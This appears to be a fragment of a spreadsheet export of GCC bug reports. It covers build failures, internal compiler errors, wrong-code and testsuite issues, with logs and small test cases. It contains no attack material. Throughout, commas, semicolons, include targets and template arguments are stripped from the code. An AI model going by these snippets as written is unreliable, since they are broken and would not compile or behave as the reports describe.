libiberty/strsignal.c compiles differently depending on if HAVE_PSIGNAL is defined or not.
HAVE_PSIGNAL is nowhere defined in the whole gcc-4.5.2 tree.
In turn strsignal.c defines in all cases a function
void
psignal (int signo char *message)
In libc-2.13 signal.h defines the function as 
void
psignal (int __sig __const char *__s)
When I compile gcc 4.5.2 with the above configuration I get the message:
[...]
/src/gcc452-build/./gcc/xgcc -B/src/gcc452-build/./gcc/ -B/usr/i686-pc-linux-gnu/bin/ -B/usr/i686-pc-linux-gnu/lib/ -isystem /usr/i686-pc-linux-gnu/include -isystem /usr/i686-pc-linux-gnu/sys-include    -c -DHAVE_CONFIG_H -O3  -I. -I../../../gcc-4.5.2/libiberty/../include  -W -Wall -Wwrite-strings -Wc++-compat -Wstrict-prototypes -pedantic  ../../../gcc-4.5.2/libiberty/strsignal.c -o strsignal.o
../../../gcc-4.5.2/libiberty/strsignal.c:554:1: error: conflicting types for 'psignal'
/usr/include/signal.h:150:13: note: previous declaration of 'psignal' was here
make[2]: *** [strsignal.o] Error 1
make[2]: Leaving directory `/src/gcc452-build/i686-pc-linux-gnu/libiberty'
make[1]: *** [all-target-libiberty] Error 2
make[1]: Leaving directory `/src/gcc452-build'
make: *** [all] Error 2
Changing in libiberty/strsignal.c
psignal (int signo char *message)
with
psignal (int signo const char *message)
does solve the problem.</t>
  </si>
  <si>
    <t>dilyan.palauzov</t>
  </si>
  <si>
    <t>GCC-18679</t>
  </si>
  <si>
    <t>[4.0 Regression] Does not bootstrap error: '_Jv_Constants java::lang::Class::constants' is private</t>
  </si>
  <si>
    <t>I checked out a version from CVS on 2004-11-25 configured with 
~/src/gcc/configure --prefix=$HOME/gcc 
--enable-languages=cadac++f95javaobjctreelang 
and ran make bootstrap.  This fails with the error 
In file included from /home/eschnett/src/gcc/libjava/link.cc:13: 
./include/config.h:408:1: warning: this is the location of the previous 
definition 
/home/eschnett/src/gcc/libjava/link.cc: In static member function 'static 
_Jv_word _Jv_Linker::resolve_pool_entry(java::lang::Class* int)': 
/home/eschnett/src/gcc/libjava/java/lang/Class.h:497: error: '_Jv_Constants 
java::lang::Class::constants' is private 
/home/eschnett/src/gcc/libjava/link.cc:101: error: within this context 
/home/eschnett/src/gcc/libjava/java/lang/Class.h:530: error: 
'java::lang::ClassLoader* java::lang::Class::loader' is private 
/home/eschnett/src/gcc/libjava/link.cc:115: error: within this context 
/home/eschnett/src/gcc/libjava/java/lang/Class.h:530: error: 
'java::lang::ClassLoader* java::lang::Class::loader' is private 
/home/eschnett/src/gcc/libjava/link.cc:117: error: within this context 
/home/eschnett/src/gcc/libjava/java/lang/Class.h:493: error: '_Jv_ushort 
java::lang::Class::accflags' is private 
/home/eschnett/src/gcc/libjava/link.cc:129: error: within this context 
/home/eschnett/src/gcc/libjava/java/lang/Class.h:491: error: '_Jv_Utf8Const* 
java::lang::Class::name' is private 
/home/eschnett/src/gcc/libjava/link.cc:130: error: within this context 
/home/eschnett/src/gcc/libjava/java/lang/Class.h:491: error: '_Jv_Utf8Const* 
java::lang::Class::name' is private 
... and then many similar errors.  The error messages finish with 
/home/eschnett/src/gcc/libjava/link.cc:1760: error: within this context 
/home/eschnett/src/gcc/libjava/java/lang/Class.h:534: error: 'jbyte 
java::lang::Class::state' is private 
/home/eschnett/src/gcc/libjava/link.cc:1762: error: within this context 
make[3]: *** [link.lo] Error 1 
make[3]: Leaving directory 
`/home/eschnett/src/gcc-build/i686-pc-linux-gnu/libjava' 
make[2]: *** [all-recursive] Error 1 
make[2]: Leaving directory 
`/home/eschnett/src/gcc-build/i686-pc-linux-gnu/libjava' 
make[1]: *** [all-target-libjava] Error 2 
make[1]: Leaving directory `/home/eschnett/src/gcc-build' 
make: *** [bootstrap] Error 2</t>
  </si>
  <si>
    <t>GCC-17416</t>
  </si>
  <si>
    <t>stack variable merging doesn't work</t>
  </si>
  <si>
    <t>I tried a simple test of the new stack merging functionality in mainline
and it refused to merge variables in differenct scopes.
e.g. the attached example generates with -O2:
f:
.LFB2:
        subq    $232 %rsp
I would have expected a stack frame size around 100</t>
  </si>
  <si>
    <t>GCC-37753</t>
  </si>
  <si>
    <t>[4.4 Regression] Convert=BIG_ENDIAN reverses character</t>
  </si>
  <si>
    <t>From http://gcc.gnu.org/ml/fortran/2008-10/msg00045.html :
$ cat foo.f90
 character(len=16) :: string string2
  string='BIG_ENDIAN'
open(unit=13form='unformatted'file='gftest.dat'convert='big_endian'status='UNKNOWN')
  write(13) string
  close(13)
end
$ gfortran foo.f90
$ ./a.out
$ od -t x1 -t a gftest.dat
0000000 00 00 00 10 20 20 20 20 20 20 4e 41 49 44 4e 45
        nul nul nul dle  sp  sp  sp  sp  sp  sp   N   A   I   D   N   E
0000020 5f 47 49 42 00 00 00 10
          _   G   I   B nul nul nul dle
0000030</t>
  </si>
  <si>
    <t>GCC-50293</t>
  </si>
  <si>
    <t>-flto fails if GCC is installed in directory with space in path name</t>
  </si>
  <si>
    <t>The majority of GCC seems to run fine if installed in a directory with spaces in the filename. However there seems to be an issue if -flto is used in 4.6.1 that wasn't an issue in 4.5.1.
collect2 version 4.6.1 (arm/ELF)
/cygdrive/c/Program Files/gnu/bin/../lib/gcc/arm-elf/4.6.1/../../../../arm-elf/bin/ld -plugin /cygdrive/c/Program Files/gnu/bin/../libexec/gcc/arm-elf/4.6.1/cyglto_plugin-0.dll -plugin-opt=/cygdrive/c/Program Files/gnu/bin/../libexec/gcc/arm-elf/4.6.1/lto-wrapper.exe -plugin-opt=-fresolution=/tmp/ccRdw4BE.res -plugin-opt=-pass-through=-lgcc -plugin-opt=-pass-through=-lgcc --relax -EL -v -L/cygdrive/c/Program Files/gnu/bin/../lib/gcc/arm-elf/4.6.1/cyclone -L/cygdrive/c/Program Files/gnu/bin/../lib/gcc/arm-elf/4.6.1/../../../../arm-elf/lib/cyclone -L/cygdrive/c/Program Files/gnu/bin/../lib/gcc/arm-elf/4.6.1 -L/cygdrive/c/Program Files/gnu/bin/../lib/gcc -L/cygdrive/c/Program Files/gnu/bin/../lib/gcc/arm-elf/4.6.1/../../../../arm-elf/lib /tmp/cciZHvSE.o -lgcc -T crt0.ld -lgcc -T cyclone.ld
/cygdrive/c/Program Files/gnu/bin/../lib/gcc/arm-elf/4.6.1/../../../../arm-elf/bin/ld: /cygdrive/c/Program: error in plugin cleanup (ignored)
/cygdrive/c/Program Files/gnu/bin/../lib/gcc/arm-elf/4.6.1/../../../../arm-elf/bin/ld: /cygdrive/c/Program: error loading plugin
collect2: ld returned 1 exit status
I tried quoting the options in the specs file but that didn't seem to help. i.e.:
 -plugin %(linker_plugin_file)     -plugin-opt=%(lto_wrapper)</t>
  </si>
  <si>
    <t>GCC-1622</t>
  </si>
  <si>
    <t>-fvtable-gc flag optimizes away virtual functions even if function is used</t>
  </si>
  <si>
    <t>Makefile output with options:
-----------------------------------------------
arm-elf-gcc -mcpu=strongarm		 -c -o cpptest.o -g -v -save-temps -Wall -I//c/My\ Documents/Public/eCos/test_install/include -ffunction-sections -fdata-sections -fno-exceptions -fno-rtti -fvtable-gc -finit-priority cpptest.cxx
Reading specs from /tools/H-i686-pc-cygwin/lib/gcc-lib/arm-elf/2.95.2/specs
gcc version 2.95.2 19991024 (release)
 /tools/H-i686-pc-cygwin/lib/gcc-lib/arm-elf/2.95.2/cpp.exe -lang-c++ -v -I//c/My Documents/Public/eCos/test_install/include -D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -Darm -Darm_elf -D__ELF__ -D__arm__ -D__arm_elf__ -D__ELF__ -D__arm -D__arm_elf -Acpu(arm) -Amachine(arm) -D__CHAR_UNSIGNED__ -g -Wall -D__ARM_ARCH_4__ -D__APCS_32__ cpptest.cxx cpptest.ii
GNU CPP version 2.95.2 19991024 (release) (ARM/ELF non-Linux)
#include ... search starts here:
#include  search starts here:
 //c/My Documents/Public/eCos/test_install/include
 /tools/H-i686-pc-cygwin/lib/gcc-lib/arm-elf/2.95.2/include
 /tools/H-i686-pc-cygwin/lib/gcc-lib/arm-elf/2.95.2/../../../../arm-elf/include
End of search list.
The following default directories have been omitted from the search path:
 /tools/H-i686-pc-cygwin/lib/gcc-lib/arm-elf/2.95.2/../../../../../include/g++-3
 /tools/H-i686-pc-cygwin/lib/gcc-lib/arm-elf/2.95.2/../../../../arm-elf/sys-include
End of omitted list.
 /tools/H-i686-pc-cygwin/lib/gcc-lib/arm-elf/2.95.2/cc1plus.exe cpptest.ii -quiet -dumpbase cpptest.cc -mcpu=strongarm -g -Wall -version -ffunction-sections -fdata-sections -fno-exceptions -fno-rtti -fvtable-gc -finit-priority -o cpptest.s
GNU C++ version 2.95.2 19991024 (release) (arm-elf) compiled by GNU C version 2.95.2 19991024 (release-2).
 /tools/H-i686-pc-cygwin/arm-elf/bin/as.exe -mstrongarm -o cpptest.o cpptest.s
arm-elf-gcc -mcpu=strongarm		 -nostartfiles -L//c/My\ Documents/Public/eCos/test_install/lib -Wl--gc-sections -o cpptest cpptest.o -Ttarget.ld -nostdlib
-----------------------------------------------------------
options passed to configure when gcc was built:
-----------------------------------------------------------
/src/gcc/gcc-2.95.2/configure --target=arm-elf \
      --prefix=/tools \
      --exec-prefix=/tools/H-i686-pc-cygwin \
      --with-gnu-as --with-gnu-ld --with-newlib \
      -v 2&gt;&amp;1 | tee configure.out 
-----------------------------------------------------------
Description of the problem:
Virtual fuction Test2::f1() is removed from executable if option -fvtable-gc is used. Entry for this function in virtual table is 0 resulting exception being generated on execution. If -fvtable-gc falg is not used executable is correct.
Sample preprocessed file is attached.
Release:
gcc version 2.95.2 19991024 (release)
Environment:
windows 2000. i686
cross compiled for arm-elf target.
eCos gcc patch applied
file is linked with eCos from cvs source three.
file is executed on intel Assabet board.
I expect this bug can be reproduced on other platforms as well.
How-To-Repeat:
Compile attached file.
Run it.
Exception is generated.</t>
  </si>
  <si>
    <t>GCC-2863</t>
  </si>
  <si>
    <t>gcc accepts invalid explicit specialization syntax</t>
  </si>
  <si>
    <t>As a follow-up to the last report talking about explicit
instantiations: gcc also allows explicit specializations
with wrong arguments. This is somewhat more critical as
the compiler thereby looses the ability to warn you about
the then necessarily unused arguments.
Regards
  Wolfgang
Release:
unknown
Environment:
gcc 2.95 gcc cvs of May 05
How-To-Repeat:
-----/gcc-bugs&gt; cat a.cc
struct X {
    template  void f(int=0)
}
template  void X::f () {}
-----/gcc-bugs&gt; ~/Config/gcc-ss-sun/bin/gcc -W -Wall -ansi -c a.cc -o /dev/null
-----/gcc-bugs&gt; ~/Config/gcc-ss-sun/bin/gcc -v                                 
Reading specs from /home/atlas2/wolf/Config/gcc-ss-sun/bin/../lib/gcc-lib/sparc-sun-solaris2.7/3.0/specs
Configured with: ../gcc/configure --prefix=/home/people/wolf/Config/gcc-ss-sun --with-gnu-as --with-as=/usr/local/bin/as --with-gnu-ld --with-ld=/usr/local/bin/ld
Thread model: posix
gcc version 3.0 20010514 (prerelease)</t>
  </si>
  <si>
    <t>GCC-77869</t>
  </si>
  <si>
    <t>ICE on a code piece</t>
  </si>
  <si>
    <t>Created attachment 39758
test.cpp
This piece of code (minimized as far as I tried) causes a segfault on GCCs 6.2.0 and 6.2.1. Clang compiles the piece correctly. I'm not sure what's going on here -- it seems related to a friend class when the class name is typedef'd in the parent with involvement of templates.
If there's anything more that is helpful to nail this bug down I'll be happy to help!</t>
  </si>
  <si>
    <t>ab</t>
  </si>
  <si>
    <t>GCC-72840</t>
  </si>
  <si>
    <t>PASS-&gt;NA: 20_util/ratio/cons/cons_overflow_neg.cc</t>
  </si>
  <si>
    <t>Hi
2 error checks have stopped being run in 20_util/ratio/cons/cons_overflow_neg.cc due to syntax error on the dg-error line.
Indeed the dg-error directives at lines 40 and 46 are missing the closing curly braces:
l40
  std::ratio r1 __attribute__((unused)) // { dg-error required from here
l46
  std::ratio r1 __attribute__((unused)) // { dg-error required from here</t>
  </si>
  <si>
    <t>GCC-53055</t>
  </si>
  <si>
    <t>ICE in cp_build_indirect_ref at cp/typeck.c:2836</t>
  </si>
  <si>
    <t>Created attachment 27203
preprocessed source
seen with 4.6 and 4.7 branches and trunk on i686-linux-gnu
$ gcc -c -g part-combine-iterator.ii 
part-combine-iterator.cc: In member function 'virtual void Part_combine_iterator::derived_mark() const':
part-combine-iterator.cc:173:40: internal compiler error: in cp_build_indirect_ref at cp/typeck.c:2836
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-34569</t>
  </si>
  <si>
    <t>undefined symbols in builtin-math-4.exe on powerpc-apple-darwin8</t>
  </si>
  <si>
    <t>The gcc.dg/torture/builtin-math-4.c testcase doesn't link properly on powerpc-apple-darwin8. The link fails with...
/sw/src/fink.build/gcc43-4.2.999-20071221/darwin_objdir/gcc/xgcc -B/sw/src/fink.build/gcc43-4.2.999-20071221/darwin_objdir/gcc/ /sw/src/fink.build/gcc43-4.2.999-20071221/gcc-4.3-20071221/gcc/testsuite/gcc.dg/torture/builtin-math-4.c -O0 -fno-show-column -lm -m32 -o builtin-math-4.exe
/usr/libexec/gcc/powerpc-apple-darwin8/4.0.1/ld: Undefined symbols:
_j0f
_j0l
_j1f
_j1l
_jnf
_jnl
_link_error
_y0f
_y0l
_y1f
_y1l
_ynf
_ynl
collect2: ld returned 1 exit status
using Xcode 2.5. This problem doesn't exist on powerpc-apple-darwin9 using Xcode 3.0. Attempts to compile with -funsafe-math-optimizations and the various settings for trapping-math reciprocal-math signed-zeros and associative-math doesn't seem to help solve this issue.</t>
  </si>
  <si>
    <t>GCC-7251</t>
  </si>
  <si>
    <t>Documentation still refers to -a and -ax</t>
  </si>
  <si>
    <t>According to rth on bug 6888 you removed -a and -ax but the man page does not reflect this at all.
Release:
unknown
Environment:
gcc-3.x
How-To-Repeat:
try to compile any c or c++ file with -a or -ax</t>
  </si>
  <si>
    <t>GCC-34352</t>
  </si>
  <si>
    <t>Multi-line descriptions are not picked up for translation</t>
  </si>
  <si>
    <t>It appears that multi-line descriptions in *.opt files are not picked up correctly.  As an example in config/bfin/bfin.opt there are these lines:
mleaf-id-shared-library
Target Report Mask(LEAF_ID_SHARED_LIBRARY)
Generate code that won't be linked against any other ID shared libraries
but may be used as a shared library.
po/gcc.pot however contains this:
#: config/bfin/bfin.opt:52
msgid 
Generate code that won't be linked against any other ID shared libraries
msgstr 
That is the second line of the description is missing.  (Or alternatively it is a bug in bfin.opt that more than one is used for the description.  I haven't investigated what the defined format for these files are.)</t>
  </si>
  <si>
    <t>GCC-44180</t>
  </si>
  <si>
    <t>[vect256] Wrong vec_extract_evenv8sf and vec_extract_oddv8sf</t>
  </si>
  <si>
    <t>[hjl@gnu-6 gcc]$ cat z.c
#define N 16
float b[N] = {0123456789101112131415}
float c[N] = {0123456789101112131415}
float a[N]
void
test (void)
{
  int i
  for (i = 0 i &lt; N/2 i++)
    a[i] = b[2*i+1] * c[2*i+1]
}
[hjl@gnu-6 gcc]$ ./xgcc -B./ -O2 -ftree-vectorize -mavx -S z.c
[hjl@gnu-6 gcc]$ cat z.s
	.file	z.c
	.text
	.p2align 415
.globl test
	.type	test @function
test:
.LFB0:
	.cfi_startproc
	vxorps	%xmm0 %xmm0 %xmm0
	pushq	%rbp
	.cfi_def_cfa_offset 16
	movq	%rsp %rbp
	.cfi_offset 6 -16
	.cfi_def_cfa_register 6
	vmovaps	%ymm0 a(%rip)
	leave
	.cfi_def_cfa 7 8
	ret
	.cfi_endproc
The probem is vec_extract_evenv8sf and vec_extract_oddv8sf call
expand_vec_perm_even_odd_1 which calls expand_vselect and expand_vec_perm_vpermil without checking return values. For V4SF
those functions return false.</t>
  </si>
  <si>
    <t>GCC-65138</t>
  </si>
  <si>
    <t>testsuite ICEs on powerpc64le</t>
  </si>
  <si>
    <t>Running the testsuite on the new gcc2-2-power8.osuosl.org powerpc64le machine shows:
FAIL: gcc.c-torture/execute/20050604-1.c   -O2 -flto -fno-use-linker-plugin -flto-partition=none  (internal compiler error)
FAIL: gcc.c-torture/execute/20050604-1.c   -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  (internal compiler error)
FAIL: gcc.c-torture/execute/20060420-1.c   -O2 -flto -fno-use-linker-plugin -flto-partition=none  (internal compiler error)
FAIL: gcc.c-torture/execute/20060420-1.c   -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  (internal compiler error)
FAIL: c-c++-common/torture/vector-compare-1.c   -O2 -flto -fno-use-linker-plugin -flto-partition=none  (internal compiler error)
FAIL: c-c++-common/torture/vector-compare-1.c   -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  (internal compiler error)
FAIL: gcc.dg/torture/pr45678-1.c   -O2 -flto -fno-use-linker-plugin -flto-partition=none  (internal compiler error)
FAIL: gcc.dg/torture/pr45678-2.c   -O2 -flto -fno-use-linker-plugin -flto-partition=none  (internal compiler error)
FAIL: c-c++-common/torture/vector-compare-1.c   -O2 -flto -fno-use-linker-plugin -flto-partition=none  (internal compiler error)
FAIL: c-c++-common/torture/vector-compare-1.c   -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  (internal compiler error)
These all have the same backtrace:
c-c++-common/torture/vector-compare-1.c: In function â€˜mainâ€™:
c-c++-common/torture/vector-compare-1.c:108:8: internal compiler error: in convert_move at expr.c:315
     f0 = (vector (4 float)){(float)argc 1.  2.  10.}
        ^
0x1030bf03 convert_move(rtx_def* rtx_def* int)
        ../../gcc/gcc/expr.c:315
0x103130a7 store_expr_with_bounds(tree_node* rtx_def* int bool tree_node*)
        ../../gcc/gcc/expr.c:5459
0x1031b5e7 expand_assignment(tree_node* tree_node* bool)
        ../../gcc/gcc/expr.c:5154
0x101cb33f expand_gimple_stmt_1
        ../../gcc/gcc/cfgexpand.c:3385
0x101cb33f expand_gimple_stmt
        ../../gcc/gcc/cfgexpand.c:3481
0x101d2dd7 expand_gimple_basic_block
        ../../gcc/gcc/cfgexpand.c:5470
0x101d5387 execute
        ../../gcc/gcc/cfgexpand.c:6088
Please submit a full bug report
FAIL: gcc.dg/torture/vector-1.c   -O2 -flto -fno-use-linker-plugin -flto-partition=none  (internal compiler error)
FAIL: gcc.dg/torture/vector-2.c   -O2 -flto -fno-use-linker-plugin -flto-partition=none  (internal compiler error)
These two have a different backtrace:
gcc.dg/torture/vector-2.c:15:16: internal compiler error: in expand_expr_real_1 at expr.c:9666
  ((int*)
                ^
0x103087c3 expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def** bool)
        ../../gcc/gcc/expr.c:9666
0x1031b8c3 expand_expr
        ../../gcc/gcc/expr.h:254
0x1031b8c3 expand_assignment(tree_node* tree_node* bool)
        ../../gcc/gcc/expr.c:4851
0x101cb33f expand_gimple_stmt_1
        ../../gcc/gcc/cfgexpand.c:3385
0x101cb33f expand_gimple_stmt
        ../../gcc/gcc/cfgexpand.c:3481
0x101d2dd7 expand_gimple_basic_block
        ../../gcc/gcc/cfgexpand.c:5470
0x101d5387 execute
        ../../gcc/gcc/cfgexpand.c:6088
Please submit a full bug report
with preprocessed source if appropriate</t>
  </si>
  <si>
    <t>GCC-29153</t>
  </si>
  <si>
    <t>[ecj] clean up pthread assumptions</t>
  </si>
  <si>
    <t>The new Unsafe code assumes pthreads in a number of places.
This blocks a merge.</t>
  </si>
  <si>
    <t>GCC-60774</t>
  </si>
  <si>
    <t>f951: internal compiler error: Segmentation fault: 11</t>
  </si>
  <si>
    <t>Created attachment 32555
A fortran program I wrote.
gfortran -Wall -O3 -o $1 $2
energy.f95:180.3:
123 
   1
Warning: Ignoring statement label in empty statement at (1)
f951: internal compiler error: Segmentation fault: 11
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>kevinecahill</t>
  </si>
  <si>
    <t>GCC-41830</t>
  </si>
  <si>
    <t>Missing warning: control reaches end of non-void function in -O2</t>
  </si>
  <si>
    <t>Example: 
  class Bug {}
  const Bug bug() {}
compile with -Wreturn-type -O1: no warning
compile with -Wreturn-type -O2: no warning
compile with -Wreturn-type -O3: warning printed
If I read the documentation correctly -Wreturn type should work with or without optimizing.</t>
  </si>
  <si>
    <t>grxnprzn</t>
  </si>
  <si>
    <t>GCC-54211</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE: verify_gimple failed building freetype with -Os</t>
  </si>
  <si>
    <t>Created attachment 27966
preprocessed src
After rev190220 freetype fails to build with -Os.  Seen on mips ppc x86 and x86_64.
Reduced testcase:
/home/ryan/ice.i: In function â€˜tt_face_load_sbit_imageâ€™:
/home/ryan/ice.i:365:1: error: type mismatch in pointer plus expression
 tt_face_load_sbit_image (TT_Face face FT_ULong strike_index
 ^
sizetype
unsigned long
sizetype
D.2244_30 = D.2241_17 + slsr.98_48
/home/ryan/ice.i:365:1: internal compiler error: verify_gimple failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-36538</t>
  </si>
  <si>
    <t>namelist failure with tabs preceding object name</t>
  </si>
  <si>
    <t>The following testcase illustrates the issue.
Reported here:
http://gcc.gnu.org/ml/fortran/2008-06/msg00149.html
      program check1
      real x
      namelist/casein/x
      read(1casein)
      print*x
      end
fort.1 contains:
&amp;CASEIN	
		x=1.
/
Two tabs precede x.</t>
  </si>
  <si>
    <t>GCC-25734</t>
  </si>
  <si>
    <t>[4.2 Regression] ice for legal kernel code with -Os</t>
  </si>
  <si>
    <t>just tried to compile a recent Linux kernel [ 2.6.15] with a recent
GNU C compiler version 4.2 snapshot 20060107. It said
fs/sysfs/inode.c:227: error: missing definition
for SSA_NAME: entry_36 in statement:
#   sysfs_dir_cachep_65 = V_MAY_DEF 
sd_31-&gt;s_sibling.next = entry_36
fs/sysfs/inode.c:227: internal compiler error: verify_ssa failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[2]: *** [fs/sysfs/inode.o] Error 1
It seems the crash only appears when -Os flag is used. 
Preprocessed source code available on request.</t>
  </si>
  <si>
    <t>GCC-80041</t>
  </si>
  <si>
    <t>std::codecvt_utf16 converts to UTF-8 not UTF-16</t>
  </si>
  <si>
    <t>#include 
#include 
#include 
int main()
{
  std::codecvt_utf16 conv
  wchar_t wc = 0x6557
  char bytes[4] = {0}
  const wchar_t* wnext = nullptr
  std::mbstate_t st{}
  char* next = nullptr
  auto r = conv.out(st 
  if (r == std::codecvt_base::ok)
    for (int i = 0 bytes[i] ++i)
      std::cout &lt;&lt; std::hex &lt;&lt; (int)(unsigned char)(bytes[i]) &lt;&lt; ' '
  std::cout &lt;&lt; '\n'
}
This prints:
e6 95 97 
Which is the UTF-8 encoding for U+6557.
It should print:
65 57</t>
  </si>
  <si>
    <t>GCC-52048</t>
  </si>
  <si>
    <t>[4.7 Regression] -fcompare-debug failure with -O2 -fcompare-debug -fnon-call-exceptions -fno-tree-dominator-opts</t>
  </si>
  <si>
    <t>Created attachment 26510
autoreduced testcase (from g++.dg/torture/pr41775.C)
Compiler output:
$ gcc -O2 -fcompare-debug -fnon-call-exceptions -fno-tree-dominator-opts testcase.C
gcc: error: testcase.C: -fcompare-debug failure
$ diff testcase.*gkd
187188c187188
&lt;             (set (reg/f:DI 5 di [69])
&lt;                 (plus:DI (reg/f:DI 5 di [orig:67 this ] [67])
---
&gt;             (set (reg/f:DI 5 di [68])
&gt;                 (plus:DI (reg/f:DI 5 di [orig:66 this ] [66])
Tested revisions:
r183676 - fail</t>
  </si>
  <si>
    <t>GCC-67598</t>
  </si>
  <si>
    <t>[6 Regression] Target powerpc-e500v2-linux-gnuspe failed to bootstrap</t>
  </si>
  <si>
    <t>6.0.0-alpha20150913 snapshot fails to build for powerpc-e500v2-linux-gnuspe w/ the following:
build/genoutput gcc-6-20150913/gcc/common.md gcc-6-20150913/gcc/config/rs6000/rs6000.md \
  insn-conditions.md &gt; tmp-output.c
gcc-6-20150913/gcc/config/rs6000/vsx.md:1299: error: undefined machine-specific constraint at this point: Sr&gt;?
gcc-6-20150913/gcc/config/rs6000/vsx.md:1299: note:  in operand 0
gcc-6-20150913/gcc/config/rs6000/vsx.md:1299: error: undefined machine-specific constraint at this point: Sa&gt;
gcc-6-20150913/gcc/config/rs6000/vsx.md:1299: note:  in operand 0
gcc-6-20150913/gcc/config/rs6000/vsx.md:1299: error: undefined machine-specific constraint at this point: Sr&gt;
gcc-6-20150913/gcc/config/rs6000/vsx.md:1299: note:  in operand 1
gcc-6-20150913/gcc/config/rs6000/vsx.md:1299: error: undefined machine-specific constraint at this point: Sa&gt;
gcc-6-20150913/gcc/config/rs6000/vsx.md:1299: note:  in operand 1
gcc-6-20150913/gcc/config/rs6000/vsx.md:1299: error: undefined machine-specific constraint at this point: Sr&gt;
gcc-6-20150913/gcc/config/rs6000/vsx.md:1299: note:  in operand 2
gcc-6-20150913/gcc/config/rs6000/vsx.md:1299: error: undefined machine-specific constraint at this point: Sa&gt;
gcc-6-20150913/gcc/config/rs6000/vsx.md:1299: note:  in operand 2
gcc-6-20150913/gcc/config/rs6000/vsx.md:1299: error: undefined machine-specific constraint at this point: Sr&gt;
gcc-6-20150913/gcc/config/rs6000/vsx.md:1299: note:  in operand 3
gcc-6-20150913/gcc/config/rs6000/vsx.md:1299: error: undefined machine-specific constraint at this point: Sa&gt;
gcc-6-20150913/gcc/config/rs6000/vsx.md:1299: note:  in operand 3
gcc-6-20150913/gcc/config/rs6000/vsx.md:1310: error: undefined machine-specific constraint at this point: Sr&gt;?
gcc-6-20150913/gcc/config/rs6000/vsx.md:1310: note:  in operand 0
gcc-6-20150913/gcc/config/rs6000/vsx.md:1310: error: undefined machine-specific constraint at this point: Sa&gt;
gcc-6-20150913/gcc/config/rs6000/vsx.md:1310: note:  in operand 0
gcc-6-20150913/gcc/config/rs6000/vsx.md:1310: error: undefined machine-specific constraint at this point: Sr&gt;
gcc-6-20150913/gcc/config/rs6000/vsx.md:1310: note:  in operand 1
gcc-6-20150913/gcc/config/rs6000/vsx.md:1310: error: undefined machine-specific constraint at this point: Sa&gt;
gcc-6-20150913/gcc/config/rs6000/vsx.md:1310: note:  in operand 1
gcc-6-20150913/gcc/config/rs6000/vsx.md:1310: error: undefined machine-specific constraint at this point: Sr&gt;
gcc-6-20150913/gcc/config/rs6000/vsx.md:1310: note:  in operand 2
gcc-6-20150913/gcc/config/rs6000/vsx.md:1310: error: undefined machine-specific constraint at this point: Sa&gt;
gcc-6-20150913/gcc/config/rs6000/vsx.md:1310: note:  in operand 2
gcc-6-20150913/gcc/config/rs6000/vsx.md:1310: error: undefined machine-specific constraint at this point: Sr&gt;
gcc-6-20150913/gcc/config/rs6000/vsx.md:1310: note:  in operand 3
gcc-6-20150913/gcc/config/rs6000/vsx.md:1310: error: undefined machine-specific constraint at this point: Sa&gt;
gcc-6-20150913/gcc/config/rs6000/vsx.md:1310: note:  in operand 3
gcc-6-20150913/gcc/config/rs6000/vsx.md:2279: error: undefined machine-specific constraint at this point: Sa&gt;
gcc-6-20150913/gcc/config/rs6000/vsx.md:2279: note:  in operand 0
gcc-6-20150913/gcc/config/rs6000/vsx.md:2279: error: undefined machine-specific constraint at this point: Sa&gt;
gcc-6-20150913/gcc/config/rs6000/vsx.md:2279: note:  in operand 1
gcc-6-20150913/gcc/config/rs6000/vsx.md:2279: error: undefined machine-specific constraint at this point: Sa&gt;
gcc-6-20150913/gcc/config/rs6000/vsx.md:2279: note:  in operand 2
Makefile:2156: recipe for target 's-output' failed
I noticed that much VSX-related work have been done in this release cycle according to ChangeLog. The last versions that worked correctly for me were 5.1.0 and 6.0.0-alpha20150412 (of 5.1 branch and trunk respectively) and after that I've stopped doing my own weekly builds. I still have to find out when the issue have started showing up given that I now have half a year wide window.</t>
  </si>
  <si>
    <t>GCC-2594</t>
  </si>
  <si>
    <t>g++ crashes when compiling</t>
  </si>
  <si>
    <t>GNU C++ version 2.95.2 19991024 (release) (i486-suse-linux) compiled by GNU C version 2.95.2 19991024 (release).
Factory.cpp: In method `void Factory::prepareCol(short unsigned int)':
Factory.cpp:332:   instantiated from `Factory::getMoreSpace()'
Factory.cpp:163:   instantiated from `Factory::create()'
Industry.h:30:   instantiated from here
Factory.cpp:65: Internal compiler error.
Factory.cpp:65: Please submit a full bug report.
Factory.cpp:65: See  for instructions.
Release:
gcc version 2.95.2
Environment:
Reading specs from /usr/lib/gcc-lib/i486-suse-linux/2.95.2/specs
gcc version 2.95.2 19991024 (release)
How-To-Repeat:
g++ -v -save-temps -c  -g -DSMT -DLINUX -DDEBUG -DSAFE -I. -I../include -I../../smt/include -I../../smt/src -I../../mint/include -I../../mint/src -I../../STL  DPTask.cpp -o ../objd/DPTask.o</t>
  </si>
  <si>
    <t>renau</t>
  </si>
  <si>
    <t>GCC-49038</t>
  </si>
  <si>
    <t>[4.5/4.6/4.7 Regression] -ftree-vectorise introduces reads past end of array</t>
  </si>
  <si>
    <t>Created attachment 24276
Test case
The vectoriser has support for interleaved loads with gaps
such as:
   ...a[n*4]
   ...a[n*4+1]
   ...a[n*4+2]
It implements this by loading blocks of 4*vectfactor elements
from a[] then permuting them.  However it doesn't seem to
check whether the gap elements are provably loadable.
The attached testcase segfaults on x86_64-linux-gnu with
-O2 -ftree-vectorize but works with plain -O2.</t>
  </si>
  <si>
    <t>GCC-48374</t>
  </si>
  <si>
    <t>ICE: in single_succ_edge at basic-block.h:562 with -fselective-scheduling2 and __builtin_unreachable()</t>
  </si>
  <si>
    <t>Created attachment 23824
reduced testcase
Compiler output:
$ gcc -O -fschedule-insns2 -fsel-sched-pipelining -fsel-sched-pipelining-outer-loops -fselective-scheduling2 --param max-sched-extend-regions-iters=100 testcase.c 
testcase.c: In function 'foo':
testcase.c:14:1: internal compiler error: in single_succ_edge at basic-block.h:562
Please submit a full bug report
with preprocessed source if appropriate.
